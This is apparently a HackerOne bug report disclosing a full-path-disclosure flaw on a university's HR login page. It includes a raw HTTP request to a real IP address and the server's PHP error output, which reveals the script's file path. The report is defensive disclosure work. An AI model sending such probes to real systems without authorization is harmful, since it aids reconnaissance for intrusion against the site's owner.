International Islamic University Chittagong: Full Path Disclosure

2017-10-30T16:39:54
ID H1:284250
Type hackerone
Reporter mrreboot
Modified 2017-10-31T05:14:36

Description

Hi Team, i would like to report sensitive info disclosure via login page

PoC:

send below request to see the path disclosure.

``` GET /hrd/logining.php HTTP/1.1 Host: 119.18.148.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=uga9lkg0vflffh4983qaitalj7 Connection: close Upgrade-Insecure-Requests: 1

```

Response is like below.

``` HTTP/1.1 302 Found Date: Mon, 30 Oct 2017 16:35:47 GMT Server: Apache/2.4.25 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: login.php?error=User ID or Password does not find. Content-Length: 231 Connection: close Content-Type: text/html; charset=UTF-8

<br /> <b>Notice</b>: Undefined index: user_id in <b>/var/www/html/hrd/logining.php</b> on line <b>9</b><br /> <br /> <b>Notice</b>: Undefined index: user_password in <b>/var/www/html/hrd/logining.php</b> on line <b>10</b><br /> ```

Fix:

Hide internal server paths.

Regards, Mr.R3boot.